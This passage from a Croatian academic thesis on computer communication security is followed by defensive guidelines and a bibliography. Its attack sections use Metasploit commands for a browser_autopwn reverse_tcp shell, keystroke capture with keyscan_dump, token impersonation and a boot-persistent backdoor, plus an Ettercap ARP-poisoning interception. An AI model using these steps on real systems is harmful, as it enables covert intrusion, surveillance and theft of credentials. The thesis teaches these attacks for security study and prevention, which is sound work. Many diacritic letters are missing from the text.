zatiena, http://www.metasploit.com/. (preuzeto 06.03.2014.).

110

Izvor: Pritchett, W.L., Smet, D.D., (2013.). Kali Linux Cookbook, Packt Publishing,
Birmingham Mumbai
Ovdje e se prikazati jedna od mnogobrojnih Metasploitovih mogunosti iskoritavanja
ranjivosti, a inicira se samim pristupom odreenoj web stranici. Napad se plasira putem
Metasploit MSFCONSOLE terminalskog suelja, nosi naziv browser_autopwn i automatski vri
detekciju operativnog sustava mete koja prisupi eljenoj web stranici, procjenu ranjivosti i nakon
toga plasira oblik napada prema vlastitoj procjeni, ovisno o web pregledniku sa kojeg meta
pristupa. Uspjeni napad omoguit e distribuciju eljenog payload-a na metu, u naem primjeru
keylogging sesiju napadaa sa metom. Najprije se putem MSFCONSOLE poziva
browser_autopwn modul (prema Pritchet i Smet, 2013:167):
use auxiliary/server/browser_autopwn
Slika 37: Browser_autopwn modul

Izvor: Pritchett, W.L., Smet, D.D., (2013.). Kali Linux Cookbook, Packt Publishing,
Birmingham Mumbai
Zatim odabiremo eljeni payload, u naem sluaju reverse_tcp:
set payload windows/meterpreter/reverse_tcp
postavljamo adresu hosta na koji e meta pristupiti
set LHOST (meta)

111

set URIPATH "filetypes"


i pokreemo napad
exploit
Kada meta posjeti postavljenu web adresu, modul e se pokuati povezati s njome i
uspostaviti udaljenu sesiju (eng. remote session). Ukoliko je napad uspjean, Meterpreter e
obznaniti povezanost. Sesiju aktiviramo naredbom:
session i 1
Sada moemo pratiti i svaki otipkani znak sa tipkovnice mete pomou naredbe:
keyscan_dump
Bitno je na kraju ovog potpoglavlja navesti neke bitne razlike izmeu hakerskog
pristupa kakvim se ono bavi, i moguih ostalih, bitno jednostavnijih, mnogostruko opasnijih ali
ujedno i banalnijih pristupa. Kod izvoenja napada najbitnije je ostaviti to manje tragova.
To znai da uspjean napad prolazi kroz vatrozid, antivirusni softver i sve ostale
konvencionalne metode zatite sustava raunalne komunikacije, i ne zasniva se na metodi hit
and run (udari i bjei), ve predstavlja gotovo posve neuoljivu intruziju u sustav koja
omoguava dugoroan naknadni pristup i kontrolu nad metom. Takvi napadi vidljivi su samo
vrhunskim IT strunjacima i donose alarmantnu situaciju kada se otkriju.
S druge strane, vrlo je jednostavno penetrirati u veinu sustava ali jo je jednostavnije
otkriti napadaa koji se slui agresivnim metodama napada ili pak preplavljivanjem (eng. flood)
mete viestrukim napadima po sustavu ako proe proe.
Naalost, brojni sustavi osigurani su vrlo slabim sigurnosnim politikama, ali to je
iskljuivo krivnja IT osoblja zaduenog za sigurnost, a ne samih sustava. Loe obrazovanje,
slaba primanja i nedostatak motivacije ljudskih potencijala koji se bave IT sektorom mogli bi
ugroziti brojne raunalne sustave tijela dravne uprave nae zemlje.

5.6.4 Poveavanje prava radi naknadnog pristupa

Jednom kada smo uspjeno pristupili meti, cilj nam postaje poveati ovlasti pristupa (eng.
escalating privileges) do krajnjih moguih granica. Najee meti po prvi puta pristupamo sa

112

korisnikim ovlastima, a cilj nam je doi do administratorskih ili sistemskih (prema Pritchet i
Smet, 2013:172).
Jedan od najelegantnijih naina da to uinimo je imitiranjem tokena za logiranje (eng.
impersonation tokens) uporabom Metasploitove Meterpreter naredbe incognito.
Prisjetimo se uspostavljene sesije iz prolog potpoglavlja:

Slika 38: Meterpreter shell sesija

Izvor: Pritchett, W.L., Smet, D.D., (2013.). Kali Linux Cookbook, Packt Publishing,
Birmingham Mumbai

U Meterpreter shell suelju unosimo naredbu:


use incognito
Otipkamo li naredbu help, ukazat e nam se nekoliko opcija:

Slika 39: Opcije Meterpreter naredbe use incognito

Izvor: Pritchett, W.L., Smet, D.D., (2013.). Kali Linux Cookbook, Packt Publishing,
Birmingham Mumbai

Sada nas zanima popis korisnikih rauna na meti, pa koristimo naredbu:


list_tokens u

113

Slika 40: Korisniki rauni na meti

Izvor: Pritchett, W.L., Smet, D.D., (2013.). Kali Linux Cookbook, Packt Publishing,
Birmingham Mumbai

Pokreemo napad imitiranjem tokena naredbom:


impersonate_token [naziv rauna koji imitiramo]
u naem konkretnom sluaju
impersonate_token \\willie-pc\willie
Sada na meti imamo jednaka prava pristupa kao korisnik imitiranog rauna.
Naknadni pristup meti moemo ostvariti koritenjem imitiranog tokena, uspostavom
otpornog stranjeg ulaza (eng. backdoor), metodom proslijeivanja hash-a lozinke176 (eng.
pass-the-hash177), ili brojnim drugim metodama. Ovdje emo prikazati metodu uspostave
stranjeg ulaza.
Jednom kada smo uspjeno penetrirali metu, nije nam u interesu ponovno ponavljati cijeli
postupak. Uspjeno uspostavljenu sesiju moe omesti gaenje raunala ili bilo koji drugi
imbenik, a stranji ulaz upravo je rjeenje koje e nam omoguiti elegantan povratak u sesiju
bez potrebe ponavljanja napada.
U Meterpreter shell suelju unijet emo naredbu:
run persistence h

Ovaj backdoor podrava mnoge opcije ukljuujui178:


176

moe se pribaviti takozvanim dumpingom SAM datoteke, uz pomo programa WCE (Windows
Credentials Editor), ili presretanjem mrene komunikacije (vidi potpoglavlje 5.6.5),
http://www.ampliasecurity.com/research/wcefaq.html. (preuzeto 06.03.2014.).
177

Pouzdana dugogodinja metoda daljinskog logiranja u operativne sustava MS Windows do serije 8


jednostavnim proslijeivanjem hash-a korisnike lozinke (LM, NTLM, NTLMv2), bez ikakve potrebe za
njegovom dekripcijom., http://en.wikipedia.org/wiki/Pass_the_hash. (preuzeto 06.03.2014.).
178

Pritchett, W.L., Smet, D.D., op. cit, str. 84.

114

A -opcija starta automatsko povezivanje sa metom;

S -omoguava da se backdoor na meti pokree kao servis;

U -backdoor automatski starta im se operativni sustav na meti podigne;

i -opcija za postavljanje vremenskog razmaka (u sekundama) izmeu dva pokuaja


uspostavljanja automatske sesije;

p -opcija za odreivanje porta za uspostavu sesije na meti;

P -opcija za postavljanje eljenog payload-a. Standardna postavka je reverse_tcp payload,


a to je u najveem broju sluajeva i najoptimalniji izbor.

r -opcija za postavljanje porta na napadaevom raunalu.

Zatim unosimo naredbu za postavljanje backdoor-a:


run persistence U A i 10 8090 r (meta)
Slika 41: Meterpreter persistance backdoor

Izvor: Pritchett, W.L., Smet, D.D., (2013.). Kali Linux Cookbook, Packt Publishing,
Birmingham Mumbai
Ukoliko je sve proteklo u redu, uspostavit e se jo jedna dodatna Meterpreter sesija.
5.6.5 Presretanje raunalne komunikacije

Nadzor raunalne komunikacije moemo promatrati kao presretanje mrenih paketa (eng.
network packet). Presretanje paketa podrazumijeva itanje paketa od strane aplikacije kojoj paket
nije originalno namijenjen, a programe za presretanje mrenog paketa nazivamo analizatori
paketa ili popularno sniffer-i179.

Slika 42: Pozicija sniffera unutar mree

179

http://www.cis.hr/sigurosni-alati/pracenje-mreznog-prometa.html. (preuzeto 25.03.2014.).

115

Izvor: http://www.cis.hr/sigurosni-alati/pracenje-mreznog-prometa.html
Alati mogu biti programska ili sklopovska rjeenja180.
Sklopovska rjeenja su obino uske namjene, ugrauju se u telekomunikacijsku opremu
te su sposobna vrlo brzo analizirati promet protokola nad kojim su izgraeni. Takoer,
oslobaaju korisnika od potrebe da sam generira neispravan mreni promet u svrhu ispitivanja
(budui da automatski i kontinuirano zapisuju isti)181.
Programska rjeenja, s druge strane, obino su ire namjene te su sposobna analizirati
mnogo vie protokola. Koriste se u instancama kada se eli otkriti uzrok odreene anomalije182.
Neki od primjera koritenja sniffera jesu183:

detekcija mrenih pogreki;

detekcija pokuaja upada na sustav;

izolacija sustava sa mrenim kvarom,

nadzor podataka u prijenosu mreom;

prikupljanje statistike mrenog prometa i sl.


Najea je primjena takvih alata ipak otkrivanje pogreki i problema u komunikaciji i

upravo je, u tu svrhu prilagoen, najpoznatiji takav alat Wireshark184. Radi se o vrlo sloenom
alatu koji ovdje neemo pojanjavati. Bitno je uoiti da se takvi alati mogu iskoristiti za

180

loc. cit.

181

loc. cit.

182

loc. cit.

183

loc. cit.

184

Wireshark je besplatni alat (izdan pod GPL licencom) otvorenog koda za analizu mrenog prometa.
Alat je dostupan za operacijske sustave Windows (XP, Vista, 7,8) te Linux/BSD,
http://www.cis.hr/sigurosni-alati/pracenje-mreznog-prometa.html. (preuzeto 06.03.2014.).

116

presretanje komunikacije izmeu mete i treih strana kao dio MITM185 ili DoS (eng. Denial of
Service) napada. Takvi napadi omoguavaju napadaima prikupljanje informacija za daljnje
napade.
Ovdje emo prikazati izvoenje MITM napada uporabom Ettercap186 softvera
Najprije naredbom ettercap G pokreemo grafiko suelje softvera, zatim biramo nain
presretanja (unified ili bridged), odabiremo eljeni mreno suelje (eng. interface), te pokreemo
skeniranje raspoloivih meta da bismo dobili njihov popis.
Slika 43: Popis meta dobivenih skeniranjem raspona IP adresa

Izvor: Pritchett, W.L., Smet, D.D., (2013.). Kali Linux Cookbook, Packt Publishing,
Birmingham Mumbai
Za potrebe ovog primjer, kao target 1 odabrat emo gateway, a kao target 2 metu, ime
zapravo nadziremo promet izmeu mete i gateway-a. Gateway je zapravo IP adresa rutera, koji
ima ulogu usmjeravanja svog komunikacijskog prometa unutar svog IP raspona.
Zatim pokreemo opciju Start Sniffing i nakon toga ARP187 poisoning188 proces.
185

Man-In-The-Middle attack napad je prislukivanjem komunikacije izmeu mete i treih strana, uz


njihovo uvjerenje da komuniciraju meusobno a zapravo itavom komunikacijom upravlja napada,
http://en.wikipedia.org/wiki/Man-in-the-middle_attack. (preuzeto 06.03.2014.).
186

Izvrstan OSS alat za izvoenje MITM napada, podrava aktivan i pasivan nain rada i integrirane su
mu mnoge korisne opcije za analizu mree i mete, http://ettercap.github.io/ettercap/. (preuzeto
06.03.2014.).
187

Adress Resolution Protocol, koristi se za rezoluciju IP adresa u fizike (MAC) adrese Ethernet
protokola, http://en.wikipedia.org/wiki/Address_Resolution_Protocol. (preuzeto 06.03.2014.).
188

Cilj je asocirati MAC adresu napadaa sa IP adresom drugog hosta (najee gateway-a), ime se
postie preusmjeravanje svog prometa na adresu napadaa, http://en.wikipedia.org/wiki/ARP_spoofing.
(preuzeto 06.03.2014.).

117

Slika 44: ARP poisoning u Ettercap suelju

Izvor: Pritchett, W.L., Smet, D.D., (2013.). Kali Linux Cookbook, Packt Publishing,
Birmingham Mumbai
Slika 45: Ettercap suelje MITM napada

Izvor: Pritchett, W.L., Smet, D.D., (2013.). Kali Linux Cookbook, Packt Publishing,
Birmingham Mumbai
Pokretanjem ARP poisoning funkcije, napada se pretvara da je gateway rutera, stoga
sav promet biva preusmjeren na njega. Uvijek, pa tako i u naem sluaju, treba odabrati samo
jednu metu iji e se promet nadzirati. Raunala nemaju ruterske sklopove i ne mogu obraivati
koliinu prometa koja bi ih preplavila u sluaju pokuaja nadziranja cijelog raspona IP adresa,
to bi dovelo do prekida komunikacije na itavom navedenom rasponu i kompromitacije
napadaa.
Ovisno o filterima koji se odaberu, prikazat e se eljeni segmenti nadziranog prometa.
Vrlo uinkovit nain izbjegavanja ARP trovanja jer koritenje statikih ARP tablica zbog
kojih su ARP poruke suvine. Naalost, statike ARP tablice nisu pogodne za velike mree jer ih

118

je teko odravati ako postoji veliki broj raunala. Za velike mree se preporua koritenje alata
poput ArpON ili ARPDefender koji prijavljuju sumnjive ARP poruke. U budunosti e ARP
protokol zamijeniti protokol NDP (eng. Neighbor Discovery Protocol) koji je sastavni dio
protokola IPv6 (eng. Internet Protocol Version 6)189.
5.6.6 Napad uskraivanjem usluge

DoS napad ili napad uskraivanjem usluge je pokuaj stvaranja raunalnih resursa
privremeno ili stalno nedostupnim ili neiskoristivim ovlatenim korisnicima 190. To je tip
sigurnosnog propusta raunalnih sustava koji nuno ne rezultira kraom informacija ili bilo
kojim drugim materijalnim gubitkom.
DoS napadi javljaju se u dva osnovna oblika. Jedan od njih je prisiljavanje raunala rtve
da zauzme svoje resurse tako da vie ne moe pruati usluge koje je trebalo pruati. Drugi oblik
je naruavanje naina komunikacije izmeu legalnih korisnika i raunala rtve tako da isti
postaje neadekvatan. Ve prije (poglavlje V.) opisani su neki poznatiji DoS napadi, a u nastavku
slijede neke od metoda za uspjenu obranu191:

pravilno konfigurirati vatrozid,

onemoguciti nepotrebne i nekoritene servise,

omoguciti ogranienja diskovnog prostora za pojedine korisnike,

napraviti procjenu legitimnog koritenja resursa za laku detekciju napada,

redovno provjeravati fiziku ispravnost svih resursa,

koristiti alate za detekciju izmjena konfiguracijskih datoteka,

investirati u kupovinu i izgradnju pomonih ureaja koji bi se koristili tijekom napada,

investirati u sigurnu izgradnju mrene infrastrukture kako bi se poveala tolerancija na


pogreke,

redovito izraivati sigurnosne kopije sustava ili njihovih najvanijih dijelova,

189

CIS FER, (2011). Zatita od prislukivanja mrenog prometa, CIS-DOC-2011-10-029,


http://www.cis.hr/files/dokumenti/CIS-DOC-2011-10-029.pdf. (preuzeto 25.03.2014.9., str. 23.
190

http://en.wikipedia.org/wiki/Denial-of-service. (preuzeto 25.03.2014.).

191

CARNet CERT u suradnji s LS&S, (2006). Napadi uskraivanjem resursa. CCERT-PUBDOC-2006-07162. Revizija v1.1., http://www.cert.hr/sites/default/files/CCERT-PUBDOC-2006-07-162.pdf. (preuzeto
25.03.2014.). , str. 17.

119

paljivo osmisliti naine dodjele zaporki, dozvola i sl.

120

6. SMJERNICE ZA USPOSTAVU SIGURNOSTI RAUNALNE


KOMUNIKACIJE
Postoji nebrojeno mnogo naina napada na raunalni komunikacijski sustav i jednako
toliko naina da se od njih obrani. U cijelosti i napad i obrana zavise od entiteta mete napada i
zato je nemogue precizno definirati globalne smjernice za adekvatnu zatitu, ali mogue je
skrenuti pozornost na jednostavne zahvate kojima moemo otkloniti glavninu rizika koji se
odnosi na potencijalne ranjivosti sustava. Smjernice se odnose na korporativne komunikacijske
sustave.
-

komponente raunalnog komunikacijskog sustava nikada ne bi smjele biti u fizikom


smislu lako dostupne neovlatenim osobama. Aktivnu i pasivnu opremu potrebno je
drati koliko je god to mogue van dosega neovlatenih osoba, UTP portovi ne bi smjeli
biti aktivni ukoliko se ne koriste ve ih je potrebno pasivizirati do ukapanja opreme;

raunala povezana u komunikacijski sustav, ovisno o osjetljivosti podataka koje


razmjenjuju, ne bi smjela biti dostupna neovlatenim osobama, ak i ako su iskljuena;

u nevjerojatno velikom postotku glavni uzrok intruzije u raunalne sustave je slaba snaga
zaporke rauna za administriranje. Naime, IT osoblje sklono je dodijeljivati jednu te istu
(slabu!) zaporku veem broju raunala, obino na razini cijelog subnet-a, tako da su u
sluaju kompromitacije administrativne zaporke latentno ugroena sva koja komuniciraju
na navedenoj razini. Dobar primjer zaporke je kombinacija velikih i malih slova, brojeva
i posebnih znakova, ne kraa od 10 znakova i po mogunosti bez logike poveznice. Ne
treba koristiti iste zaporke za pristup raznim servisima, posebice ukoliko se kombiniraju
zaporke internih servisa sa onima na internetu. Takoer je potrebno postaviti strogu
sigurnosnu politiku u sluaju viestrukog unosa pogrene zaporke kako bi se na vrijeme
sprijeili eventualni pokuaji penetracije forsiranjem zaporke (eng. bruteforcing);

operativne sustave nuno je nadograivati pravovremeno, jer su nadogradnjama


otklonjene uoene ranjivosti. Isto vrijedi i za vatrozide, kao i antivirusne softvere ali i sve
aplikativne softvere koji se nalaze instalirani na raunalima/serverima;

velik broj penetracija u raunalne sustave su sabotae dolaze iznutra. Zaposlenicima


treba omoguiti svrhovitu opremljenost raunalnim softverima, bez potrebe za dodatnim
intervencijama sa njihove strane i u skladu s navedenim ne dodijeljivati im ovlasti vee
od korisnikih. Takoer je potrebno kreirati odgovarajuu politiku komunikacije raunala
sa perifernim jedinicama te u svezi s time onemoguiti pokretanje eventualnih drugih

121

operativnih sustava iz radne memorije, putem CD/DVD ureaja ili USB porta. BIOS
raunala potrebno je takoer zatititi zaporkom. Openito, treba onemoguiti izvravanje
bilo kakvih programskih procedura koje nisu sastavni dio predinstaliranog sustava.
Ukoliko su radi funkcioniranja pojedinih aplikacija u antivirusni softver dodane odreene
iznimke, iste ne bi smjele biti vidljive na korisnikoj razini ovlatenja. Openito, treba
koristiti antivirusna rjeenja koja se u cijelosti mogu zatititi od bilo kakvih dodatnih
podeavanja ili iskljuivanja.
-

pristup internetu putem proxy servera esto je rjeenje u intranet okruenju, ali
predstavlja znaajnu ugrozu. Ovdje bi trebalo rtvovati eleganciju nautrb sigurnosti, pa
dodatno modificirati to rjeenje uporabom virtualnih raunala za pristup internetu;

VPN tuneli koje korporacije esto koriste za vanjsko povezivanje sa intranetom mogu se
smatrati sigurnim, ali opet onoliko koliko je sigurna lozinka kojom se uspostavljaju.
Ovdje posebice treba obratiti pozornost na sigurnosnu politiku kod ponavljanja pogrenih
zaporki;

kako na lozinku, potrebno je obratiti pozornost i na korisniko ime. Nije dobra praksa
generiranje korisnikih imena temeljem stvarnih imena i prezimena korisnika. Na taj
nain stvara se obrazac prema kojem napada moe, poznajui hijerarhijski ustroj
organizacije ak i kroz medije, lako pogoditi korisniko ime osobe za koju pretpostavlja
da su joj dodijeljena ovlatenja visoke razine.

potrebno je voditi rauna o kretanju djelatnika kroz slubu i u skladu s time aurirati
ovlatenja;

kad god je to mogue, raunala koja se ne koriste treba iskljuiti iz komunikacijskog


kanala, gaenjem ili fizikim prekidanjem TCP/IP veze;

ukoliko sustav raunalne komunikacije ukljuuje i onu beinim putem koritenjem


standarda IEEE 802.11192, potrebno je obratiti pozornost na slijedee:

192

Skupina standarda 802.11 trenutano sadri est naina beine modulacije signala, koji koriste isti
protokol, a najei naini su definirani a, b i g dodatcima izvornom standardu koji se ponekad naziva
"802.11 legacy"; sigurnosne odredbe su naknadno dodane i okupljene su u 802.11i dodatku. Ostali
dodatci ove porodice (c-f, h-j, n) su servisna podoljanja i proirenja ili ispravke prijanjih odredbi.
802.11b je prvi iroko rasprostranjeni beini standard, a 802.11g je trenutano u najveoj ekspanziji, dok
je 802.11a slabije rairen, ali takoer vrlo prisutan u svijetu. 802.11b i 802.11g standardi koriste
nelicencirani pojas frekvencija na 2,4 GHz. Standard 802.11a koristi frekvencije na 5 GHz. Radom na tim
frekvencijama, 802.11b i 802.11g ureaji mogu biti ometani od strane mikrovalnih penica, beinih
telefona, kamera i drugih ureaja koji takoer koriste taj "neregulirani" pojas frekvencija.,
http://hr.wikipedia.org/wiki/IEEE_802.11. (preuzeto 06.03.2014.).

122

ukoliko se koristi WEP193 zatitni klju (lozinku), u postavkama modema


aktivirajte zatitni filter MAC adrese ureaja kojima namjeravate dozvoliti pristup
ruteru;

ukoliko koristite WPA-PSK zatitni klju, potrebno je onemoguiti "WPS" opciju


u postavkama rutera;
u oba sluaja, prilikom stvaranja zatitnog kljua koristiti dulje fraze uz obvezno
kombiniranje velikih i malih slova, brojeva i posebnih znakova.

Deset skupina pitanja o zatiti informatike sigurnosti koja bi povremeno morao postaviti
svaki rukovoditelj ili osoba zaduena za zatitu194:

1. Jeste li zadovoljni nainom kako se u vaem poduzeu zapoljavaju djelatnici


na zamjeni i vanjski suradnici?
-

Kako se provjerava njihova povjerljivost?

Kako je organiziran nadzor?

Koja i kakva ovlatenja im se dodjeljuje za pristup do povjerljivih informacija?


2. Znate li za pojavu da djelatnici koriste tue korisnike identifikacije i
lozinke, unato zabrani?

Postoje li pravila o standardizaciji lozinki?

Je li definiran minimalni i maksimalni period koritenja lozinke?

Moe li se negdje pojaviti lozinka vidljiva na ekranu ili na papiru?

Zahtijeva li sustav promjenu lozinke nakon isteka definiranog perioda?

193

Wired Equivalent Privacy (WEP) je algoritam za sigurnu komunikaciju putem IEEE 802.11 beinih
mrea. Obzirom da beine mree koriste radio signal za prenoenje podataka one su vrlo podlone
prislukivanju za razliku od ianih mrea.Prilikom uvoenja WEP-a 1997. godine ideja vodilja je bila da
se beinoj komunikaciji osigura sigurnost jednaka onoj kakva je kod ianih mrea. To se, izmeu
ostalog, nastojalo postii enkriptiranjem komunikacije i reguliranju pristupa samoj mrei na osnovu
autentikacije putem MAC adrese mrenog ureaja. Meutim, 2004. godine dolazi do zamjene WEP-a
novim WPA algoritmom jer su ve 2001. godine uoene ranjivosti WEP algoritma.,
http://hr.wikipedia.org/wiki/WEP. (preuzeto 06.03.2014.).
194

Sartori, L. Sigurnost raunalnih mrea,


http://marjan.fesb.hr/~pravdica/srm/srm_pogl1_bez_pozadine.pdf. (preuzeto 17.03.2014.), str. 27-30.

123

3. Analiziraju li se dnevnici sustava (biljeke o aktivnostima) i kako se to esto


radi?
Da li taj posao rade informatiari - tehniko osoblje ili poznavatelji poslovnih
procesa i tehnologije rada?
4. U kojoj mjeri i kako esto uprava kri pravila zatite i ima li za to prilike?
5. Dogovaraju li se s korisnicima postupci s izlaznim materijalima (listama,
magnetskim medijima)?
Jesu li korisnici zadovoljni tim postupcima?
Dogaa li se da izlazni mediji nestanu ili se izgube Dogaa li se da izlazni mediji
nestanu ili se izgube?
6. Imate li puni nadzor nad koritenjem pomonih sistemskih programa i alata
na vaem sustavu?
Daju li se za njihovo koritenje ovlatenja i biljei li se njihovo koritenje
automatski u dnevnik sustava?
7. Postoji li nadzor nad unoenjem i iznoenjem prijenosnih raunala, disketa,
CD-ova, te ostalih medija?
Postoji li nadzor nad korisnicima Interneta?
8. Postoji li plan postupanja u sluaju da morate evakuirati uredske prostorije
ili itavu zgradu ako pri tomu gubite pristup informacijskom sustavu?
to ete poduzeti?
Ako postoji, kada je taj plan posljednji put revidiran?
9. Postoji li plan postupanja u sluaju da morate evakuirati uredske prostorije
ili itavu zgradu ako pri tomu gubite pristup informacijskom sustavu?
Postoje li pisana pravila za zatitu integriteta, raspoloivosti i povjerljivosti
informacija pohranjenih u vaem informacijskom sustavu?
Ako postoje, razumiju li ih svi vai namjetenici?

10. Niste li svoj informacijski sustav, a time i Vae poslovanje i uspjeh na tritu,
"predali" informatiarima bez adekvatnog nadzora i zatite?

124

I za kraj, 10 nepromjenjivih zakona raunalne sigurnosti195:

2. Ako Vas napada uspije uvjeriti da izvrite njegov program na Vaem raunalu
to vie nije Vae raunalo;
3. Ako napada moe podeavati operativni sustav Vaeg raunala - to vie nije
Vae raunalo;
4. Ako napada ima neogranien pristup Vaem raunalu - to vie nije Vae
raunalo;
5. Ako dopustite napadau da postavi svoj program na Vau web stranicu - to vie
nije Vaa web stranica;
6. Slabe zaporke rue jake sigurnosne sustave;
7. Raunalo je sigurno onoliko koliko je administrator od povjerenja;
8. Enkriptirani podaci sigurni su onoliko koliko i klju dekripcije;
9. Neaurirani antivirusni program samo je statistiki bolji od nikakve antivirusne
zatite;
10. Apsolutna anonimnost nije ba praktina, ni u stvarnom ivotu, ni na internetu;
11. Tehnologija ne lijei ba sve bolesti.

7. ZAKLJUAK
195

prema http://technet.microsoft.com/en-us/magazine/2008.10.securitywatch.aspx. (preuzeto


06.03.2014.).

125

Raunalna sigurnost predstavlja sve sloeniji segment informacijske tehnologije,


poglavito iz razloga implementacije IT tehnologije na svim funkcionalnim razinama. Teko je
ostvariti bilo kako poslovanje a da se barem jedan njegov dio ne vee usko uz raunalnu
komunikaciju. Posebno se ovo odnosi na platni promet koji se gotovo u cijelosti informatizirao.
Novarske institucije a i sektori koji se bave trgovinom potiu na plaanje elektronskim putem,
poglavito kartino. Za realizaciju takvih financijskih transakcija postoji niz tehnolokih rjeenja
(POS terminali, internet bankarstvo, mobilno bankarstvo, digitalni novanici i slino). Da je ovo
rastui trend ukazuje i nedavna pojava Bitcoin 196 virtualne digitalne valute koja iako iskljuena iz
svjetskog monetarnog sustava itekako slui svrsi potpuno anonimnim financijskim
transakcijama. Na svim navedenim razinama postoje latentne ugroze koje se mogu ispoljiti na
komunikacijskoj razini i prouzroiti izravne ili neizravne financijske gubitke u vidu zlouporaba
platnih podataka od strane napadaa. Neizravni gubici oituju se u prekidima ili zastojima u
komunikaciji koji, ovisno o poslovnom sektoru koji zahvate, mogu dovesti do velikih zastoja u
radnim procesima i gubitku proizvoda (autorskih djela, projektne dokumentacije).
Da bi se pozitivno utjecalo na stupanj sigurnosti raunalne komunikacije, potrebno je
osim kvalitetnog IT osoblja u sustavu i podizati svijest njegovih krajnjih korisnika. Puno
neeljenih scenarija moe se uinkovito sprijeiti dunom panjom u svezi povjerljivosti osobnih
podataka koji slue autorizaciji odreenih transakcija. Prilino dobro programski osmiljeni i
realizirani zatitni mehanizmi unutar sustava ispoljit e svoju punu snagu samo ukoliko krajnji
korisnik ne omogui distribuciju takvih podataka.
Velika je tamna brojka intruzija u slabo zatiene rutere za beinu komunikaciju, kakvi
su postali standardom davatelja usluga internet prometa. Takva intruzija slui poglavito krai
samog internet prometa, ali svakako predstavlja ulazna vrata u raunalo vlasnika i potencijalnu
opasnost od daljnjeg naruavanja njegove privatnosti u najveim razmjerima kao i pribavljanja
nezakonite imovinske koristi.
Drim da bi u Republici Hrvatskoj bilo potrebno preventivno vie djelovati u tom pravcu,
to je itekako ostvarivo putem Ministarstva unutarnjih poslova kroz programe prevencije u
medijima. Poglavito bi prevencija trebala biti usmjerena u pravcu educiranja graana o
kanjivosti takvih radnji. Takoer je potrebno sa kriminalistikog gledita obraditi aktualnu
196

Bitcoin je raunalna datoteka koja je pohranjena na raunalu korisnika i moe sluziti kao virtualni
novac. Bitcoin je sastavljen je od kompleksnog algoritma. Osmiljavaju i izrauju ga bitcoin rudari na
superraunarima. Iskljuen iz financijskog sustava i ne izdaje ga ni jedna sredinja banka. Osim toga nije
nije pod ingerencijom monternih vlasti i nema nikakvih posrednika (banaka). Na internetu se moe rabiti
poput valute s kojom se moe platiti usluge i proizvode, http://hr.wikipedia.org/wiki/Bitcoin, (preuzeto
06.03.2014.).

126

problematiku sigurnosnog aspekta raunalne komunikacije te po dobivenim rezultatima sainiti


plan preventivnog postupanja, kao i procedure suzbijanja eskaliranih trendova.
Rezultate takve procjene potrebno je zatim ugraditi u Strateku procjenu Ministarstva
unutarnjih poslova i ujedno poticati graane na prijavljivanje postojanja sumnji u poinjenje
kaznenih djela iz glave 25. Kaznenog zakona.
Ozbiljnim shvaanjem problema koje ugroavanje sigurnosti raunalne komunikacije
moe stvoriti, te imajui u vidu da je Kazneni zakon ve obuhvatio gotovo sva injenja koja
imaju relevantna obiljeja, poveati emo stupanj spremnosti za nadolazee etape
informatizacije, smanjiti mogunost nastajanja tete i vjerojatno napokon razotkriti vie kaznenih
djela koja se trenutno nekanjeno ine.

8. LITERATURA
Literatura knjige i lanci
1. Antoli,K., i dr., (2010). Sigurnost informacijskih sustava. Zagreb: Algebra d.o.o.

127

2. Antoli,K., i dr., (2010). Sigurnost raunalnih mrea. Zagreb: Algebra d.o.o.


3. Antoli K. (2010). Internetska forenzika i cyber terorizam, Policija i sigurnost,
4. (Zagreb), godina 19. broj 1
5. Pritchett, W.L., Smet, D.D. (2013). Kali Linux Cookbook. Birmingham Mumbai: Packt
Publishing
6. Himanen P (2002). Hakerska etika i duh informacijskog doba, Zagreb: Naklada Jesenski i
Turk
7. Tanenbaum, S. Andrew, Wetherall, J. D. (2010). Computer Networks, Prentice Hall.
8.

Peterson, L. Larry i Davie, S. Bruce (2011). Computer Networks: A System


Approach: Morgan Kaufmann

9.

Kurose, F. James, Ross, W. Keith (2009). Computer Networking: A Top-Down


Approach: Addison-Wesley

10. Panian, . i dr. (2005). Englesko-hrvatski informatiki enciklopedijski rjenik. Zagreb:


Europapres holding
11. Mrdovi, S. (2004). Izgradnja infrastrukture javnih kljueva (PKI). Sarajevo:
Elektrotehniki fakultet u Sarajevu
12. Na, I. (2009). Upravljanje rizikom (Vodi za predavanje i pregled izvora za pripremu
ispita Diplomirani kriminalist nastavak studija na Specijalistikom diplomskom
strunom studjiju kriminalistike). Zagreb
13. Grundler, D. (2000). Primijenjeno raunalstvo. Zagreb: Graphis
14. Pavii, B., Grozdani, V.,Vei, P. (2007). Komentar Kaznenog zakona. 3.izmijenjeno i
dopunjeno izdanje, Zagreb: Narodne novine
15. Glui, S., Krapac,D., Tomaevi, G. (2012). Kazneno procesno pravo, II. izmijenjeno i
dopunjeno izdanje. Zagreb: Pravna biblioteka udbenici
16. Glui, S. (2012). Posebne dokazne radnje. Polic. sigur. godina 21., broj 3, str. 555-573.
Zagreb
17. Radovan, M. (2010). Raunalne mree (1). Rijeka: Digital point tiskara
18. Radovan, M. (2011). Raunalne mree (2). Rijeka: Digital point tiskara
Literatura pravni akti
1. Kazneni zakon, (N.N 125/11 i 144/12)
2. Pravilnik o nainu provoenja posebnih dokaznih radnji,(N.N 102/09)

3. Uredba o mjerama informacijske sigurnosti (N.N 46/08)


4. Zakon o kritinim infrastrukturama, (N.N 56/13)

128

5. Zakon o zatiti tajnosti podataka (N.N 79/07 i 86/12)


6. Zakon o informacijskoj sigurnosti (N.N 79/07)
7. Zakon o kaznenom postupku (N.N 152/08, 76/09, 80/11, 121/11, 143/12, 56/13 i 145/13)
Literatura Internet izvori
1. Antoni. V. Napadi s uskraivanjem usluge (DoS napadi).
http://os2.zemris.fer.hr/ns/2007_Antoncic/index.html - 05.03.2014.
2. Armitage vs Cobalt Hooked Strike. Strategic Cyber LLC.,
http://www.advancedpentest.com/help-armitage-vs-cobaltstrike - 05.03.2014.
3. Baant, A., (2012). Osnove prijenosa podataka, FER, Zavod za telekomunikacije,
http://www.fer.unizg.hr/_download/repository/OPP-2012.pdf - 05.03.2014.
4. CARNet CERT u suradnji s LS&S, (2006). Napadi uskraivanjem resursa. CCERTPUBDOC-2006-07-162. Revizija v1.1., http://www.cert.hr/sites/default/files/CCERTPUBDOC-2006-07-162.pdf - 25.03.2014.
5. CARNet CERT u suradnji s LS&S, (2009). TLS protokol. CCERT-PUBDOC-2009-03257. Revizija 1.04. http://security.lss.hr/documents/LinkedDocuments/CCERTPUBDOC-2009-03-257.pdf - 07.04.2014.
6. CARNet CERT u suradnji s LS&S, (2003). Upravljanje sigurnosnim rizicima. CCERTPUBDOC-2003-10-44. Revizija v1.1.,
